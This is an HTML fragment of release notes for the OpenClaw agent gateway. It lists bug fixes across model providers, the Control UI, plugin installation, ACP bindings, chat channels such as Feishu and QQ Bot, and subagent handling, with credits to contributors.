<li>Providers/vLLM: send Nemotron 3 chat-template kwargs when thinking is off and honor configured <code>params.chat_template_kwargs</code> for OpenAI-compatible completions, so vLLM/Nemotron replies stay visible instead of becoming thinking-only. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329813098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71891" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71891/hovercard" href="https://github.com/openclaw/openclaw/issues/71891">#71891</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dennis-lynch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dennis-lynch">@dennis-lynch</a>.</li>
<li>Channels/replies: strip copied inbound metadata blocks from user-facing assistant replies and model replay history, so Discord/vLLM sessions do not leak <code>Conversation info</code> / <code>UNTRUSTED ... message body</code> envelopes after a model echoes them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329636801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71847/hovercard" href="https://github.com/openclaw/openclaw/issues/71847">#71847</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmystaki-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmystaki-create">@jmystaki-create</a>.</li>
<li>Subagents/memory: keep inter-session completion wakes out of memory and dreaming session exports, and strip internal runtime-context blocks from realtime Control UI chat events.</li>
<li>Agents/Claude: treat zero-token empty <code>stop</code> turns as failed provider output, retry once, repair replay, and allow configured model fallback instead of preserving them as successful silent replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71880/hovercard" href="https://github.com/openclaw/openclaw/issues/71880">#71880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MagnaAI/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MagnaAI">@MagnaAI</a>.</li>
<li>Tasks: normalize task lifecycle timestamps at create, update, and restore time, and report retained lost tasks as audit warnings until their cleanup window expires. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329725948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71871" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71871/hovercard" href="https://github.com/openclaw/openclaw/pull/71871">#71871</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/likewen-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/likewen-tech">@likewen-tech</a>.</li>
<li>Diagnostics/OTEL: treat normal early model stream cleanup as a completed model call instead of exporting a misleading <code>StreamAbandoned</code> error span. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/pairing: stop corrupt or unreadable device/node pairing stores from being treated as empty state, preserving <code>paired.json</code> for repair instead of overwriting approved pairings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329738661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71873" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71873/hovercard" href="https://github.com/openclaw/openclaw/issues/71873">#71873</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iret77/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iret77">@iret77</a>.</li>
<li>ACP: keep <code>/acp</code> management commands, plus local <code>/status</code> and <code>/unfocus</code>, on the Gateway path inside ACP-bound threads so they are not consumed as ACP prompt text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259260856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66298/hovercard" href="https://github.com/openclaw/openclaw/issues/66298">#66298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kindomLee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kindomLee">@kindomLee</a>.</li>
<li>ACPX: stop probing ACP agents during normal Gateway startup; the embedded backend now registers without spawning Codex/ACP child processes unless <code>OPENCLAW_ACPX_RUNTIME_STARTUP_PROBE=1</code> is explicitly set.</li>
<li>CLI/image edit: accept <code>--size</code>, <code>--aspect-ratio</code>, and <code>--resolution</code> on <code>openclaw infer image edit</code> and report all supported edit flags from <code>capability inspect image.edit</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pinghuachiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pinghuachiu">@Pinghuachiu</a>.</li>
<li>ACP: wait for the configured runtime backend to become healthy before startup identity reconciliation, avoiding transient acpx warnings during Gateway boot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4043233380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40566" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40566/hovercard" href="https://github.com/openclaw/openclaw/issues/40566">#40566</a>.</li>
<li>Channels/ACP bindings: time out configured binding readiness checks instead of letting Discord preflight hang forever when an ACP target never settles. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289732408" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68776/hovercard" href="https://github.com/openclaw/openclaw/issues/68776">#68776</a>.</li>
<li>Control UI: hide the chat loading skeleton during background history reloads when existing messages or active stream content are already visible, avoiding reload flashes on high-latency local gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329620242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71844" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71844/hovercard" href="https://github.com/openclaw/openclaw/issues/71844">#71844</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep locally optimistic chat messages visible when a history reload temporarily returns empty, avoiding lost first-turn messages on high-latency gateways. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329761362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71878/hovercard" href="https://github.com/openclaw/openclaw/issues/71878">#71878</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Control UI: keep chat history limits based on visible messages after filtering heartbeat and control-only transcript rows, so recent hidden entries no longer make older visible replies disappear. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/images: scrub old <code>[media attached: ...]</code>, <code>[Image: source: ...]</code>, and <code>media://inbound/...</code> markers from pruned model replay context so stale media refs are not rehydrated as fresh prompt images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329723266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71868/hovercard" href="https://github.com/openclaw/openclaw/issues/71868">#71868</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmeadlock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmeadlock">@jmeadlock</a>.</li>
<li>Docker/Bonjour: disable Bonjour/mDNS advertising by default for bundled Compose gateways on bridge networking, while keeping host/macvlan opt-in with <code>OPENCLAW_DISABLE_BONJOUR=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329762622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71879/hovercard" href="https://github.com/openclaw/openclaw/issues/71879">#71879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gbballpack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gbballpack">@gbballpack</a>.</li>
<li>CLI/status: label the OpenClaw Serve/Funnel setting as <code>Tailscale exposure</code> and show daemon state separately when available, so <code>gateway.tailscale.mode: "off"</code> no longer reads like the Tailscale daemon is stopped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329371669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71790" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71790/hovercard" href="https://github.com/openclaw/openclaw/issues/71790">#71790</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pesvobodak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pesvobodak">@pesvobodak</a>.</li>
<li>Plugins/Bonjour: stop ciao mDNS watchdog failures from looping forever when the advertiser stays stuck in <code>probing</code> or <code>announcing</code>; Bonjour now disables itself for the current Gateway process after repeated failed restarts while the Gateway keeps running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291316152" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69011" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69011/hovercard" href="https://github.com/openclaw/openclaw/issues/69011">#69011</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/siddharthaagarwalofficial-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/siddharthaagarwalofficial-ux">@siddharthaagarwalofficial-ux</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FiredMosquito831/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FiredMosquito831">@FiredMosquito831</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spikefcz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spikefcz">@spikefcz</a>.</li>
<li>Gateway/Fly.io: seed Control UI allowed origins from the actual runtime bind and port so CLI-driven non-loopback starts do not crash before config exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329508985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71823/hovercard" href="https://github.com/openclaw/openclaw/issues/71823">#71823</a>.</li>
<li>macOS/remote SSH: keep discovered gateway hosts in <code>gateway.remote.sshTarget</code> while pinning SSH transport URLs to the local loopback tunnel, so browser automation does not regress into blocked non-loopback <code>ws://</code> endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270922535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67336/hovercard" href="https://github.com/openclaw/openclaw/issues/67336">#67336</a>.</li>
<li>Gateway/proxy: bootstrap env proxy dispatching from direct Gateway startup so provider and plugin network requests honor <code>HTTPS_PROXY</code>/<code>HTTP_PROXY</code> before the first embedded agent attempt runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71833/hovercard" href="https://github.com/openclaw/openclaw/pull/71833">#71833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</li>
<li>Plugins/runtime deps: verify clean npm installs actually place requested bundled runtime packages in the managed install root, reporting exact missing specs instead of a false successful repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329764229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71883/hovercard" href="https://github.com/openclaw/openclaw/pull/71883">#71883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Plugins/discovery: ignore stale <code>plugins.load.paths</code> aliases that point back at packaged bundled plugin directories and have doctor remove them, keeping bundled plugins on the runtime-deps staging path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>Models/LM Studio: preserve <code>@iq*</code> quant suffixes in model refs and provider matching so <code>/model lmstudio/...@iq3_xxs</code> keeps the exact LM Studio variant. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327545635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71474" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71474/hovercard" href="https://github.com/openclaw/openclaw/issues/71474">#71474</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327608782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71486/hovercard" href="https://github.com/openclaw/openclaw/pull/71486">#71486</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/XinwuC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/XinwuC">@XinwuC</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Matrix/cron: preserve the live Matrix delivery target when creating implicit announce reminder jobs so mixed-case room IDs are not reconstructed from lowercased session keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329391998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71798" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71798/hovercard" href="https://github.com/openclaw/openclaw/issues/71798">#71798</a>.</li>
<li>Feishu: accept Schema 2.0 card action callbacks that report <code>context.open_chat_id</code> instead of legacy <code>context.chat_id</code>, so button callbacks no longer drop as malformed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328732574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71670/hovercard" href="https://github.com/openclaw/openclaw/issues/71670">#71670</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Feishu: keep synthetic card-action and bot-menu ids out of platform reply targets, using the real card callback message id when Feishu provides one and plain-sending otherwise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328744083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71673" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71673/hovercard" href="https://github.com/openclaw/openclaw/issues/71673">#71673</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eddy1068/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eddy1068">@eddy1068</a>.</li>
<li>Plugins/QQ Bot: prefer an installed QQ Bot plugin that declares it replaces the bundled <code>qqbot</code> channel, preventing duplicate <code>qqbot_channel_api</code> and <code>qqbot_remind</code> tool registration noise. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223849801" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63102" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63102/hovercard" href="https://github.com/openclaw/openclaw/issues/63102">#63102</a>.</li>
<li>Browser automation: keep stable tab ids and labels attached when Chromium replaces the raw target after form submissions or other action-triggered navigations, and return the replacement <code>targetId</code> from <code>/act</code> when the match is provable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4075792997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46137/hovercard" href="https://github.com/openclaw/openclaw/issues/46137">#46137</a>.</li>
<li>QQ Bot: make <code>qqbot_remind</code> schedule, list, and remove Gateway cron jobs directly for owner-authorized senders instead of returning <code>cronParams</code> and relying on a follow-up generic <code>cron</code> tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319867451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70865/hovercard" href="https://github.com/openclaw/openclaw/issues/70865">#70865</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320478556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70937" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70937/hovercard" href="https://github.com/openclaw/openclaw/pull/70937">#70937</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GaosCode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GaosCode">@GaosCode</a>.</li>
<li>Agents/ACP: hide <code>sessions_spawn</code> ACP runtime options unless an ACP backend is loaded, and make <code>/acp doctor</code> call out <code>plugins.allow</code> blocking bundled <code>acpx</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: keep ACP prompt/skill routing hidden unless an ACP runtime backend is available, and warn in doctor when enabled Codex plugin configs still route <code>openai-codex/*</code> models through PI. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media delivery: avoid sending generated image attachments twice when the assistant reply already includes explicit <code>MEDIA:</code> lines for the same turn, and reject unsafe remote <code>MEDIA:</code> URLs before delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Codex harness: ignore retryable app-server error notifications after Codex recovers, and preserve the real nested error message for terminal app-server failures instead of replacing it with a generic failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/Codex: prepare native Codex sub-agent session metadata without a nested Gateway session patch and add a focused Docker smoke for the app-server sub-agent path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: keep queued subagent announces session-only when the requester has no external channel target, avoiding ambiguous multi-channel delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189037839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59201/hovercard" href="https://github.com/openclaw/openclaw/issues/59201">#59201</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/larrylhollan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/larrylhollan">@larrylhollan</a>.</li>
<li>Image understanding: preserve configured provider-prefixed vision model metadata when callers request the model without the provider prefix, so custom image models keep their <code>input: ["text", "image"]</code> capability. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4017340728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33185/hovercard" href="https://github.com/openclaw/openclaw/issues/33185">#33185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobe9312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobe9312">@Kobe9312</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: restore the previous plugin index records if a concurrent config write conflict interrupts install, update, or uninstall metadata commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: reject native plugin archives that do not include a valid <code>openclaw.plugin.json</code>, preventing manifestless archives from writing install records that later show missing-manifest diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: remove tracked managed plugin install directories even when the persisted install path differs from the default id-derived target, while still refusing deletes outside the managed extensions root. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/update: restore previous plugin index records if core update or channel setup hits a concurrent config write conflict after plugin metadata changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/onboarding: defer channel/provider plugin install records until the owning config write commits, keeping setup failures from advancing the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: route configure and agent setup writes with pending plugin install records through the plugin index commit helper so provider onboarding metadata is not stripped by plain config writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: merge pending channel plugin install records with the existing plugin index before config writes, preserving unrelated tracked installs during channel setup, resolve, remove, and capability repair flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: defer shipped <code>plugins.installs</code> index migration during config writes until the guarded config commit window and roll it back if the config write fails before commit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions: keep embedded runtime context out of the visible user prompt by sending it as a hidden next-turn custom message, and teach doctor to repair affected 2026.4.24 transcripts with duplicated prompt-rewrite branches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329177517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71761/hovercard" href="https://github.com/openclaw/openclaw/issues/71761">#71761</a>.</li>
<li>Gateway/subagents: keep direct-loopback backend RPCs authenticated with the shared gateway token/password off stale CLI paired-device scope baselines, so internal calls no longer hit <code>scope-upgrade</code> pairing prompts while remote, browser, node, device-token, and explicit-device paths still require normal pairing approval. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229478808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63548" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63548/hovercard" href="https://github.com/openclaw/openclaw/issues/63548">#63548</a>.</li>
<li>Providers/Azure OpenAI: give deployment-scoped image generation requests a longer 600s default timeout so slow <code>gpt-image-2</code> generations can complete without a per-call <code>timeoutMs</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328916892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71705/hovercard" href="https://github.com/openclaw/openclaw/issues/71705">#71705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voytas75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voytas75">@voytas75</a>.</li>
<li>Gateway/plugins: link source-checkout bundled runtime dependency caches instead of recursively copying <code>node_modules</code> on the gateway main thread, preventing local status, node, and skill probes from timing out during startup cache restores.</li>
<li>Skills/remote nodes: only expose remote macOS skill bins for connected nodes, clear stale bin matches when node probes fail, and include probe command, timeout, bin count, and connection state in timeout logs.</li>
<li>Skills/remote nodes: recognize <code>system.which</code> object-map responses when probing connected macOS nodes, so Linux gateways can expose macOS-only skills such as Apple Notes when the required binaries are installed remotely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329760105" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71877/hovercard" href="https://github.com/openclaw/openclaw/issues/71877">#71877</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miguelarios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miguelarios">@miguelarios</a>.</li>
<li>CLI/gateway: keep diagnostic probes from creating first-time read-only device pairings, while still reusing cached device tokens for detailed read probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329202027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71766/hovercard" href="https://github.com/openclaw/openclaw/issues/71766">#71766</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SunboZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SunboZ">@SunboZ</a>.</li>
<li>CLI/plugins: keep <code>message</code> startup, <code>channels logs</code>, <code>agents delete</code>, and <code>agents set-identity</code> off broad plugin preloading; message delivery still loads plugins when the action actually runs.</li>
<li>Image understanding: resolve configured image models such as local LM Studio vision entries before reporting <code>Unknown model</code> when the discovery registry has not registered that provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261396872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66486/hovercard" href="https://github.com/openclaw/openclaw/issues/66486">#66486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
